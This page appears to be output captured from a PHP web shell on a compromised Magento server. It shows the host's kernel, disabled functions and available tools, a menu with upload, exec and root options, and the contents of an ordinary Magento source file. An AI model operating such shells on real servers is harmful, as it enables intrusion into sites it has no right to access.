Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 12:46:56
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/Data/Argument/Interpreter/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/Data/Argument/Interpreter/Composite.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Data\Argument\Interpreter; use Magento\Framework\Data\Argument\InterpreterInterface; /** * Interpreter that aggregates named interpreters and delegates every evaluation to one of them */ class Composite implements InterpreterInterface { /** * Format: array('<name>' => <instance>, ...) * * @var InterpreterInterface[] */ private $interpreters; /** * Data key that holds name of an interpreter to be used for that data * * @var string */ private $discriminator; /** * @param InterpreterInterface[] $interpreters * @param string $discriminator * @throws \InvalidArgumentException */ public function __construct(array $interpreters, $discriminator) { foreach ($interpreters as $interpreterName => $interpreterInstance) { if (!$interpreterInstance instanceof InterpreterInterface) { throw new \InvalidArgumentException( "Interpreter named '{$interpreterName}' is expected to be an argument interpreter instance." ); } } $this->interpreters = $interpreters; $this->discriminator = $discriminator; } /** * {@inheritdoc} * @throws \InvalidArgumentException */ public function evaluate(array $data) { if (!isset($data[$this->discriminator])) { throw new \InvalidArgumentException( sprintf('Value for key "%s" is missing in the argument data.', $this->discriminator) ); } $interpreterName = $data[$this->discriminator]; unset($data[$this->discriminator]); $interpreter = $this->getInterpreter($interpreterName); return $interpreter->evaluate($data); } /** * Register interpreter instance under a given unique name * * @param string $name * @param InterpreterInterface $instance * @return void * @throws \InvalidArgumentException */ public function addInterpreter($name, InterpreterInterface $instance) { if (isset($this->interpreters[$name])) { throw new \InvalidArgumentException("Argument interpreter named '{$name}' has already been defined."); } $this->interpreters[$name] = $instance; } /** * Retrieve interpreter instance by its unique name * * @param string $name * @return InterpreterInterface * @throws \InvalidArgumentException */ protected function getInterpreter($name) { if (!isset($this->interpreters[$name])) { throw new \InvalidArgumentException("Argument interpreter named '{$name}' has not been defined."); } return $this->interpreters[$name]; } }